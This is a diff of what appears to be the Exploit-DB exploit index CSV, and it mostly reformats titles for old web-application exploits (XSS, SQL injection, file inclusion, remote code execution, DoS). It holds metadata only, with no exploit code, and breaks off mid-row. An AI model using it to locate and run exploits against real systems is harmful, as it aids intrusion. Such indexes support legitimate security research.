-25731,platforms/php/webapps/25731.txt,"BookReview 1.0 add_booklist.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 -25732,platforms/php/webapps/25732.txt,"BookReview 1.0 add_url.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 +25730,platforms/php/webapps/25730.txt,"BookReview 1.0 - contact.htm user Parameter XSS",2005-05-26,Lostmon,php,webapps,0 +25731,platforms/php/webapps/25731.txt,"BookReview 1.0 - add_booklist.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 +25732,platforms/php/webapps/25732.txt,"BookReview 1.0 - add_url.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25733,platforms/php/webapps/25733.txt,"BookReview 1.0 - search.htm submit string Parameter XSS",2005-05-26,Lostmon,php,webapps,0 -25734,platforms/php/webapps/25734.txt,"BookReview 1.0 add_classification.htm isbn Parameter XSS",2005-05-26,Lostmon,php,webapps,0 +25734,platforms/php/webapps/25734.txt,"BookReview 1.0 - add_classification.htm isbn Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25735,platforms/php/webapps/25735.txt,"BookReview 1.0 suggest_review.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25736,platforms/hardware/dos/25736.txt,"Nokia 9500 vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 -25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 -25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 +25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 +25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0 25742,platforms/php/webapps/25742.txt,"NPDS 4.8 - /5.0 admin.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 @@ -22952,7 +22952,7 @@ id,file,description,date,author,platform,type,port 25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle Remote Command Execution",2005-06-07,b0iler,linux,remote,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 -25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 Default.ASP SQL Injection",2005-06-08,hack_912,asp,webapps,0 +25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 - Default.ASP SQL Injection",2005-06-08,hack_912,asp,webapps,0 25805,platforms/asp/webapps/25805.txt,"Loki Download Manager 2.0 Catinfo.ASP SQL Injection",2005-06-08,hack_912,asp,webapps,0 25806,platforms/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps,0 25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 @@ -22964,10 +22964,10 @@ id,file,description,date,author,platform,type,port 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,Metasploit,windows,remote,0 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 -25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 browse.php show_course Parameter XSS",2005-06-16,Lostmon,php,webapps,0 -25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 contact.php subject Parameter XSS",2005-06-16,Lostmon,php,webapps,0 -25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 content.php cid Parameter XSS",2005-06-16,Lostmon,php,webapps,0 -25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 send_message.php l Parameter XSS",2005-06-16,Lostmon,php,webapps,0 +25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - browse.php show_course Parameter XSS",2005-06-16,Lostmon,php,webapps,0 +25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - contact.php subject Parameter XSS",2005-06-16,Lostmon,php,webapps,0 +25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - content.php cid Parameter XSS",2005-06-16,Lostmon,php,webapps,0 +25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - send_message.php l Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - search.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 inbox/index.php view Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - tile.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 @@ -22980,11 +22980,11 @@ id,file,description,date,author,platform,type,port 25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 LOGIN.ASP SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0 25840,platforms/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x Remote Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 -25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 +25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 25843,platforms/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - index.asp Multiple Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 blog_comment.asp y Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25845,platforms/asp/webapps/25845.txt,"Uapplication Ublog Reload 1.0.5 Trackback.ASP Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 -25846,platforms/php/webapps/25846.txt,"cPanel 9.1 User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 +25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart LOGIN.ASP SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 @@ -23009,9 +23009,9 @@ id,file,description,date,author,platform,type,port 25865,platforms/asp/webapps/25865.txt,"DUware DUamazon Pro 3.0/3.1 detail.asp iSub Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 25866,platforms/asp/webapps/25866.txt,"DUware DUpaypal 3.0/3.1 detail.asp iPro Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 25867,platforms/asp/webapps/25867.txt,"DUware DUpaypal 3.0/3.1 sub.asp iSub Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25868,platforms/asp/webapps/25868.txt,"DUware DUforum 3.0/3.1 messages.asp iMsg Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25869,platforms/asp/webapps/25869.txt,"DUware DUforum 3.0/3.1 post.asp iFor Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25870,platforms/asp/webapps/25870.txt,"DUware DUforum 3.0/3.1 forums.asp iFor Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25868,platforms/asp/webapps/25868.txt,"DUware DUforum 3.0/3.1 - messages.asp iMsg Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25869,platforms/asp/webapps/25869.txt,"DUware DUforum 3.0/3.1 - post.asp iFor Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25870,platforms/asp/webapps/25870.txt,"DUware DUforum 3.0/3.1 - forums.asp iFor Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 25871,platforms/asp/webapps/25871.txt,"DUware DUforum 3.0/3.1 userEdit.asp id Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 25872,platforms/asp/webapps/25872.txt,"DUware DUclassmate 1.x - default.asp iState Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x - edit.asp iPro Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 @@ -23047,9 +23047,9 @@ id,file,description,date,author,platform,type,port 25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.threads 5.5.1/6.x - notifymod.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.threads 5.5.1/6.x - grabnext.php posted Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25904,platforms/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps,0 -25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 forgot_password.asp email Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 +25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 - forgot_password.asp email Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - register.asp Multiple Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 -25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 Language_Select.ASP HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 +25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 - Language_Select.ASP HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 25908,platforms/asp/webapps/25908.txt,"ASPPlayground.NET 3.2 SR1 - Remote Arbitrary File Upload",2005-06-27,Psycho,asp,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection",2005-06-27,Megabyte,php,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums - 'SearchResults.aspx' Cross-Site Scripting",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 @@ -23083,7 +23083,7 @@ id,file,description,date,author,platform,type,port 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 Read.CGI Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - Index.php Cross-Site Scripting",2005-07-05,mozako,php,webapps,0 -25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.php3 - Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 +25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0 25943,platforms/linux/dos/25943.txt,"OFTPD 0.3.x - User Command Buffer Overflow",2005-07-06,new.security@gmail.com,linux,dos,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 @@ -23095,7 +23095,7 @@ id,file,description,date,author,platform,type,port 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution",2005-07-07,blahplok,cgi,webapps,0 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection",2005-07-07,"Diabolic Crab",asp,webapps,0 25954,platforms/php/webapps/25954.txt,"phpauction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 -25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0 +25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - Profile.php User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 @@ -23111,9 +23111,9 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - RCE Exploit",2013-06-05,eKKiM,linux,remote,0 -25971,platforms/php/webapps/25971.txt,"Cuppa CMS (alertConfigField.php urlConfig param) - Remote/Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 +25971,platforms/php/webapps/25971.txt,"Cuppa CMS - (alertConfigField.php urlConfig param) Remote/Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 -25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 (tinybrowser.php folder param) - Path Traversal",2013-06-05,expl0i13r,php,webapps,0 +25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 - (tinybrowser.php folder param) Path Traversal",2013-06-05,expl0i13r,php,webapps,0 25974,platforms/osx/dos/25974.txt,"Mac OS X Server DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,Metasploit,linux,remote,5555 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 @@ -23123,7 +23123,7 @@ id,file,description,date,author,platform,type,port 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution",2013-06-05,Metasploit,multiple,remote,8080 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injection",2005-07-13,"Soroush Dalili",asp,webapps,0 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 Forum.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 -25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - Search.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit (0Day)",2013-06-05,kingcope,php,remote,0 @@ -23133,13 +23133,13 @@ id,file,description,date,author,platform,type,port 25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 Calendar.php Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0 25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0 25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos,0 -25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 -25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 Update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 +25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 +25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 - Update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Stored XSS",2013-06-07,expl0i13r,php,webapps,0 25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.php Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 -25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 +25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 26001,platforms/java/webapps/26001.txt,"Novell GroupWise 6.5 WebAccess HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 @@ -23159,7 +23159,7 @@ id,file,description,date,author,platform,type,port 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - Auth.php SQL Injection",2005-07-20,GHC,php,webapps,0 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 -26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 +26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 @@ -23176,17 +23176,17 @@ id,file,description,date,author,platform,type,port 26032,platforms/windows/remote/26032.html,"SPI Dynamics WebInspect 5.0.196 - Cross Application Script Injection",2005-07-26,QQLan@yandex.ru,windows,remote,0 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 ViewCart.ASP Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 -26035,platforms/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote,0 +26035,platforms/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote,0 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 results.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 categorysearch.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 -26039,platforms/php/webapps/26039.txt,"BMForum 3.0 topic.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 -26040,platforms/php/webapps/26040.txt,"BMForum 3.0 forums.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 -26041,platforms/php/webapps/26041.txt,"BMForum 3.0 post.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 +26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 +26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 +26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26042,platforms/php/webapps/26042.txt,"BMForum 3.0 announcesys.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0 26044,platforms/windows/remote/26044.txt,"MDaemon 8.0 Content Filter Directory Traversal",2005-07-27,"Tan Chew Keong",windows,remote,0 -26045,platforms/php/webapps/26045.txt,"PHPList 2.8.12 Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0 +26045,platforms/php/webapps/26045.txt,"PHPList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 @@ -23194,8 +23194,8 @@ id,file,description,date,author,platform,type,port 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - login.php UserID Parameter XSS",2005-07-29,almaster,php,webapps,0 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - index.php username Parameter XSS",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - index.php Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 -26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 -26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 admin.php XSS",2005-09-30,FalconDeOro,php,webapps,0 +26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 +26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php XSS",2005-09-30,FalconDeOro,php,webapps,0 26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0 26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - view.php id Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x - list.php release Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 @@ -23203,15 +23203,15 @@ id,file,description,date,author,platform,type,port 26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - Index.CFM Cross-Site Scripting",2005-08-01,rUnViRuS,cfm,webapps,0 26061,platforms/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,php,webapps,0 -26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 Admin.php SQL Injection",2005-08-01,SVT,php,webapps,0 -26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 Lost_password.php Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 +26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 - Admin.php SQL Injection",2005-08-01,SVT,php,webapps,0 +26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - Lost_password.php Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 Shop_Display_Products.php SQL Injection",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - Index.CFM Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 KS File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management validsession.php strRootpath Parameter XSS",2005-08-03,rgod,php,webapps,0 26068,platforms/php/webapps/26068.txt,"Web Content Management List.php strTable Parameter XSS",2005-08-03,rgod,php,webapps,0 26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 Message.ASP Cross-Site Scripting",2005-08-03,basher13,asp,webapps,0 -26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 Default.ASP SQL Injection",2005-08-03,basher13,asp,webapps,0 +26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - Default.ASP SQL Injection",2005-08-03,basher13,asp,webapps,0 26071,platforms/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting",2005-08-04,"Secunia Research",multiple,remote,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 - Index.php SQL Injection",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 Source Code Disclosure",2013-06-10,LiquidWorm,jsp,webapps,0 @@ -23269,7 +23269,7 @@ id,file,description,date,author,platform,type,port 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 register.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26123,platforms/multiple/remote/26123.rb,"Java Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26124,platforms/php/webapps/26124.txt,"WordPress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 -26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c (editor.php mapname param) - Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname param) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injection",2005-08-09,admin@batznet.com,php,webapps,0 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0 @@ -23280,7 +23280,7 @@ id,file,description,date,author,platform,type,port 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack 